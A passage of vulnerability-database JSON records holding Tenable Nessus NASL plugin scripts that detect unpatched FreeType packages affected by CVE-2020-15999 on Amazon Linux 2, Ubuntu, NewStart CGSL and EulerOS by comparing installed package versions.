value:\"p-cpe:/a:amazon:linux:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\npkgs = [\n {'reference':'freetype-2.8-14.amzn2.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'freetype-2.8-14.amzn2.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'freetype-2.8-14.amzn2.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'freetype-debuginfo-2.8-14.amzn2.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'freetype-debuginfo-2.8-14.amzn2.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'freetype-debuginfo-2.8-14.amzn2.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'freetype-demos-2.8-14.amzn2.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'freetype-demos-2.8-14.amzn2.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'freetype-demos-2.8-14.amzn2.1', 'cpu':'x86_64', 'release':'AL2'},\n {'reference':'freetype-devel-2.8-14.amzn2.1', 'cpu':'aarch64', 'release':'AL2'},\n {'reference':'freetype-devel-2.8-14.amzn2.1', 'cpu':'i686', 'release':'AL2'},\n {'reference':'freetype-devel-2.8-14.amzn2.1', 'cpu':'x86_64', 'release':'AL2'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype / freetype-debuginfo / freetype-demos / etc\");\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:39:45", "description": "The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4593-1 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS : FreeType vulnerability (USN-4593-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:freetype2-demos", "p-cpe:/a:canonical:ubuntu_linux:libfreetype-dev", "p-cpe:/a:canonical:ubuntu_linux:libfreetype6", "p-cpe:/a:canonical:ubuntu_linux:libfreetype6-dev", "p-cpe:/a:canonical:ubuntu_linux:libfreetype6-udeb"], "id": "UBUNTU_USN-4593-1.NASL", "href": "https://www.tenable.com/plugins/nessus/141615", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4593-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141615);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"USN\", value:\"4593-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS : FreeType vulnerability (USN-4593-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS / 18.04 LTS / 20.04 LTS host has packages installed that are affected by a vulnerability as\nreferenced in the USN-4593-1 advisory. Note that Nessus has not tested for this issue but has instead relied only on the\napplication's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4593-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freetype2-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfreetype-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfreetype6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfreetype6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libfreetype6-udeb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2022 Canonical, Inc. / NASL script (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04|20\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04 / 20.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'freetype2-demos', 'pkgver': '2.6.1-0.1ubuntu2.5'},\n {'osver': '16.04', 'pkgname': 'libfreetype6', 'pkgver': '2.6.1-0.1ubuntu2.5'},\n {'osver': '16.04', 'pkgname': 'libfreetype6-dev', 'pkgver': '2.6.1-0.1ubuntu2.5'},\n {'osver': '16.04', 'pkgname': 'libfreetype6-udeb', 'pkgver': '2.6.1-0.1ubuntu2.5'},\n {'osver': '18.04', 'pkgname': 'freetype2-demos', 'pkgver': '2.8.1-2ubuntu2.1'},\n {'osver': '18.04', 'pkgname': 'libfreetype6', 'pkgver': '2.8.1-2ubuntu2.1'},\n {'osver': '18.04', 'pkgname': 'libfreetype6-dev', 'pkgver': '2.8.1-2ubuntu2.1'},\n {'osver': '18.04', 'pkgname': 'libfreetype6-udeb', 'pkgver': '2.8.1-2ubuntu2.1'},\n {'osver': '20.04', 'pkgname': 'freetype2-demos', 'pkgver': '2.10.1-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'libfreetype-dev', 'pkgver': '2.10.1-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'libfreetype6', 'pkgver': '2.10.1-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'libfreetype6-dev', 'pkgver': '2.10.1-2ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'libfreetype6-udeb', 'pkgver': '2.10.1-2ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype2-demos / libfreetype-dev / libfreetype6 / libfreetype6-dev / etc');\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:11:18", "description": "The version of Google Chrome installed on the remote host is prior to 86.0.4240.111. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_10_stable-channel-update-for-desktop_20 advisory. Note that Nessus Network Monitor has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2020-10-20T00:00:00", "type": "nessus", "title": "Google Chrome < 86.0.4240.111 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2020-10-20T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701289.PASL", "href": "https://www.tenable.com/plugins/nnm/701289", "sourceData": "Binary data 701289.pasl", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:27", "description": "The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has freetype packages installed that are affected by a vulnerability:\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-10-27T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.05 / MAIN 5.05 : freetype Vulnerability (NS-SA-2021-0144)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_core:freetype", "p-cpe:/a:zte:cgsl_core:freetype-demos", "p-cpe:/a:zte:cgsl_core:freetype-devel", "p-cpe:/a:zte:cgsl_main:freetype", "p-cpe:/a:zte:cgsl_main:freetype-demos", "p-cpe:/a:zte:cgsl_main:freetype-devel", "cpe:/o:zte:cgsl_core:5", "cpe:/o:zte:cgsl_main:5"], "id": "NEWSTART_CGSL_NS-SA-2021-0144_FREETYPE.NASL", "href": "https://www.tenable.com/plugins/nessus/154544", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0144. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154544);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"NewStart CGSL CORE 5.05 / MAIN 5.05 : freetype Vulnerability (NS-SA-2021-0144)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has freetype packages installed that are affected\nby a vulnerability:\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0144\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2020-15999\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL freetype packages. Note that updated packages may not be available yet. Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_core:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_core:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:5\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.05\" &&\n release !~ \"CGSL MAIN 5.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.05 / NewStart CGSL MAIN 5.05');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL CORE 5.05': [\n 'freetype-2.8-14.el7_9.1',\n 'freetype-demos-2.8-14.el7_9.1',\n 'freetype-devel-2.8-14.el7_9.1'\n ],\n 'CGSL MAIN 5.05': [\n 'freetype-2.8-14.el7_9.1',\n 'freetype-demos-2.8-14.el7_9.1',\n 'freetype-devel-2.8-14.el7_9.1'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:44:30", "description": "According to the version of the freetype package installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-04T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.6.0 : freetype (EulerOS-SA-2021-1585)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:freetype", "cpe:/o:huawei:euleros:uvp:3.0.6.0"], "id": "EULEROS_SA-2021-1585.NASL", "href": "https://www.tenable.com/plugins/nessus/147034", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147034);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.6.0 : freetype (EulerOS-SA-2021-1585)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the freetype package installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerability :\n\n - Heap buffer overflow in Freetype in Google Chrome prior\n to 86.0.4240.111 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML\n page.(CVE-2020-15999)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1585\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f443aeb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.6.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.6.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.6.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"freetype-2.9.1-2.h1.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:45:01", "description": "The remote NewStart CGSL host, running version CORE 5.04 / MAIN 5.04, has freetype packages installed that are affected by a vulnerability:\n\n - Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.04 / MAIN 5.04 : freetype Vulnerability (NS-SA-2021-0013)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2021-0013_FREETYPE.NASL", "href": 